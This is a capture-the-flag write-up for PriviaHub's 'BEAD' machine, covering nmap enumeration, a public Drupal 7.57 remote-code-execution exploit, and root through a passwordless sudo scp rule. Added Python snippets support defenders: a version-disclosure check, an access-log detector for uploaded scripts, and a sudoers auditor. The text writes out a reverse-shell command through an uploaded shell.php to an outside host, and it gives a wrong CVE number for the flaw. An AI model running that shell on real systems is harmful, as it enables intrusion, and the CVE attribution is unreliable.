This article describes the solution steps for the retired machine named “BEAD” on the PriviaHub platform. The writeup was prepared by the PriviaHub user “CEngover”. The machine runs the Ubuntu operating system, has a Medium-3 difficulty level, and was shared specially for PriviaHub’s first anniversary. The solution steps are given below.
First, the target system was scanned with the Nmap tool.
nmap -sC -sV 172.16.5.111 -oA nmap/bead-open-ports
A script and version scan was performed against the target system with this command. The scan results are shown in Image 1.
The scan showed that TCP ports 22 and 80 are open, with an OpenSSH service on port 22 and an HTTP service on port 80. The Nmap scripts also listed the directories of the web application that are reachable over the HTTP service.
Visiting port 80 shows a login page; the website runs on the Drupal content management system. When such a content management system is encountered for the first time, information gathering needs to continue: determining the accessible sub-directories and the technologies the web application uses helps to decide the next step.
The technologies used by the website were listed with this command, and the version of the Drupal content management system was determined from the result.
Visiting the CHANGELOG.txt file that the Nmap scan had detected showed, from its most recent entry, that the installed Drupal version is 7.57.
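The version disclosure described above is the kind of thing a defender wants to check for on their own Drupal hosts. The following Python is an added example, not code from the writeup: it parses the head of a CHANGELOG.txt (a constructed sample is embedded; the real file lists releases newest-first) and compares the version it finds against a patched-version threshold that the caller supplies from the vendor advisory; the "7.58" in the usage call is a placeholder, not a statement about any specific fix.

```python
import re

# Constructed excerpt of a Drupal 7 CHANGELOG.txt (not the target's file).
# Drupal lists releases newest-first, so the first heading is the installed version.
SAMPLE_CHANGELOG = """\
Drupal 7.57, 2018-02-21
-----------------------
- Fixed security issues.

Drupal 7.56, 2017-06-21
-----------------------
- Fixed a bug.
"""

VERSION_RE = re.compile(r"^Drupal (\d+(?:\.\d+)+)", re.MULTILINE)


def latest_drupal_version(changelog_text):
    """Return the first (newest) release heading in CHANGELOG.txt, or None."""
    m = VERSION_RE.search(changelog_text)
    return m.group(1) if m else None


def version_tuple(version):
    """'7.57' -> (7, 57), so that 7.9 < 7.10 compares numerically rather than as text."""
    return tuple(int(p) for p in version.split("."))


def is_outdated(found, minimum_patched):
    """True when the found release is older than the caller's patched threshold."""
    return version_tuple(found) < version_tuple(minimum_patched)


def assess_changelog(changelog_text, minimum_patched):
    """Summarise what an exposed CHANGELOG.txt reveals about the installation."""
    found = latest_drupal_version(changelog_text)
    if found is None:
        return {"version": None, "outdated": None,
                "note": "no Drupal release heading found"}
    outdated = is_outdated(found, minimum_patched)
    return {
        "version": found,
        "outdated": outdated,
        "note": (f"Drupal {found} is below {minimum_patched}: update, and block the file"
                 if outdated else
                 f"Drupal {found} meets {minimum_patched}: still block the file"),
    }


if __name__ == "__main__":
    # The threshold is a placeholder: take the real value from the vendor advisory.
    print(assess_changelog(SAMPLE_CHANGELOG, "7.58"))
```

Whatever the comparison says, the practical fix is the same: keep Drupal patched and stop the web server from serving CHANGELOG.txt and similar text files, since the version string alone is what turns a generic scan into a targeted one.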
With the version known, it was determined that this version is affected by the Remote Code Execution vulnerability CVE-2020-7600, and the exploit code for this vulnerability was found through a Google search. You can access the exploit link here.
Image 5 shows the session obtained on the target system after running the exploit file.
ruby 44449.rb http://172.16.5.111
The vulnerability was triggered with this command and a command-line session was obtained on the target system. To get a more usable shell, an interactive reverse shell can be started through the shell.php page that the exploit uploaded to the system.
http://172.16.5.111/sites/default/files/shell.php?c=mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc 18.104.22.168 1337 1>/tmp/backpipe
This command sends a connection request to port 1337, which was being listened on by netcat on the attack machine, and a reverse shell connection was obtained.
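From the defender's side, the request above leaves a clear trace: a script file under Drupal's uploads directory (/sites/<site>/files/) being requested, with parameters, and answered with 200. The Python below is an added example, not code from the writeup or from Drupal: it parses Apache combined-format access log lines (a constructed sample is embedded, using the 203.0.113.0/24 documentation range) and flags any request for a script under that directory, noting whether the server actually served it and which query parameters it carried.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (203.0.113.0/24 is a documentation range);
# the third line has the shape of the shell.php request discussed above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2020:12:00:01 +0000] "GET /sites/default/files/logo.png HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2020:12:00:04 +0000] "GET /CHANGELOG.txt HTTP/1.1" 200 104233 "-" "curl/7.68.0"
203.0.113.5 - - [10/Oct/2020:12:00:09 +0000] "GET /sites/default/files/shell.php?c=whoami HTTP/1.1" 200 14 "-" "curl/7.68.0"
203.0.113.5 - - [10/Oct/2020:12:00:12 +0000] "GET /sites/default/files/shell.php HTTP/1.1" 403 199 "-" "curl/7.68.0"
this line is not in log format
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Drupal keeps uploads under /sites/<site>/files/; nothing there should be a script.
FILES_DIR_RE = re.compile(r"^/sites/[^/]+/files/")
SCRIPT_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = unquote(parts.path)
    entry["query"] = parse_qs(parts.query)
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Flag script requests under the uploads directory and whether they succeeded."""
    path = entry["path"].lower()
    hit = bool(FILES_DIR_RE.match(path)) and path.endswith(SCRIPT_SUFFIXES)
    return {
        "script_in_files_dir": hit,
        "served_ok": hit and entry["status"] == 200,  # 200 means the script most likely ran
        "params": sorted(entry["query"]) if hit else [],
    }


def scan_log(lines):
    """Return (ip, path, status, classification) for every flagged request."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # malformed or foreign line; skip rather than crash
        verdict = classify(entry)
        if verdict["script_in_files_dir"]:
            alerts.append((entry["ip"], entry["path"], entry["status"], verdict))
    return alerts


if __name__ == "__main__":
    for ip, path, status, verdict in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, path, status, verdict)
```

A hit with served_ok set to True means the web server executed a script from a directory that only ever needs to hold static uploads; the 403 in the fourth sample line is what a server that refuses to run scripts there should produce instead, so the rule fires on both but only the first is an incident.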
The session was obtained as the user rain, who has low privileges on the target system. To list what rain can do with sudo, the sudo -l command was executed. It showed that rain can run the scp tool with root privileges without supplying a password.
The steps shown in Image 7 were carried out to obtain a root shell through the scp application, completing privilege escalation to root rights.
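The root cause of this last step is a sudoers rule, not a software bug, so it is also the easiest thing for an administrator to audit. The Python below is an added example (not from the writeup): it parses user specifications from a sudoers-format file (a constructed sample is embedded, whose last line has the shape of the rule sudo -l revealed for rain), tracks NOPASSWD tags the way sudoers carries them across a comma-separated command list, and ranks each rule by whether it reaches root, whether it needs a password, and whether the command is in a caller-supplied set of tools that can hand the caller a shell; that set defaults to scp because that is what this machine demonstrated, and should be extended from your own baseline.

```python
import os
import re

# Constructed sudoers excerpt (not the target machine's file); the last line
# reproduces the shape of the rule the writeup found with sudo -l.
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
rain    ALL=(ALL) NOPASSWD: /usr/bin/scp
"""

SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^((?:[A-Z_]+:\s*)+)")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias",
                 "Runas_Alias", "@include")


def parse_sudoers(text):
    """Return user specs as dicts: user, runas, commands=[(cmd, tags)]."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments (and #include lines)
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0]   # sudo's default Runas is root
        commands, tags = [], set()
        for part in m.group("cmds").split(","):
            part = part.strip()
            t = TAG_RE.match(part)
            if t:
                new = {x.rstrip(":") for x in t.group(1).split()}
                if "PASSWD" in new:        # PASSWD: cancels an earlier NOPASSWD:
                    tags.discard("NOPASSWD")
                tags |= new - {"PASSWD"}   # other tags persist for later commands
                part = part[t.end():].strip()
            if part:
                commands.append((part, frozenset(tags)))
        specs.append({"user": m.group("user"), "runas": runas, "commands": commands})
    return specs


def audit_sudoers(text, risky=frozenset({"scp"})):
    """Rank rules by how directly they let a non-root user reach root."""
    findings = []
    for spec in parse_sudoers(text):
        if spec["user"] == "root":
            continue  # root's own ALL line is the normal baseline
        as_root = any(r.strip() in ("ALL", "root") for r in spec["runas"].split(","))
        for cmd, tags in spec["commands"]:
            binary = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            nopasswd = "NOPASSWD" in tags
            shell_capable = cmd == "ALL" or binary in risky
            if shell_capable and nopasswd and as_root:
                severity = "high"      # root shell for the price of one command
            elif shell_capable and as_root:
                severity = "medium"    # still root, but the user's password is needed
            elif nopasswd:
                severity = "low"       # passwordless, but a narrowly scoped command
            else:
                continue
            findings.append({"user": spec["user"], "command": cmd,
                             "runas": spec["runas"], "nopasswd": nopasswd,
                             "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f["severity"].upper(), f["user"], "->", f["command"], "as", f["runas"])
```

Run it against /etc/sudoers and the files in /etc/sudoers.d on a host you administer; a high finding such as rain's should be removed or rewritten without NOPASSWD and without a tool that can be turned into a shell or into arbitrary file access as root.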